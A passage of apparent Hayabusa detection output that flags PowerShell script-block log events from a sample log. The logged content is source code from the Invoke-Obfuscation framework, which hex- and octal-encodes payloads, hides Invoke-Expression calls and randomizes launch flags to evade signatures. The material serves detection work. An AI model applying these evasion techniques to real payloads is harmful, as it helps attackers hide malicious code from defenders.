= $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 16 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters g-z with random case to $RandomDelimiters (avoiding a-f as it will be used for Hexadecimal values). @('g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Hex values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script w",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.258 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.258 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ithout dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.258 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"ithout dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.258 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.262 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedOctalCommand { <# .SYNOPSIS Generates octal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedOctalCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedOctalCommand encodes an input PowerShell scriptblock or path as an octal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInteractive -NoProfil ""( '127f162f151X164B145f55R110_157@163{164f40n47{110R145{154R154f157{40X127B157{162X154f144L41f47R40L55n106{157{162f145@147X162@157X165n156f144L103L157L154_157f162_40L107f162R145f145f156f73_40@127<162_151{164_145{55B110<157X163f164X40X47_117{142f146_165L163f143@141L164n151_157f156R40_122@157{143X153R163R41_47_40R55R106_157f162f145@147n162{157{165B156X144f103B157{154<157L162<40f107<162<145<145_156'.SPlIt( 'LX@fR_Bn{<' ) |% {( [Char] ([Convert]::ToInt16( ( [String]$_),8 ) )) }) -Join''| Invoke-Expression"" C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX(-Join (( 127 ,162 ,151 ,164 , 145 , 55 ,110, 157, 163 , 164 , 40,47 , 110 , 145 , 154 ,154 ,157,40 , 127 ,157,162 , 154,144, 41 , 47 , 40 ,55 ,106 ,157, 162 , 145 , 147,162,157, 165,156 ,144, 103, 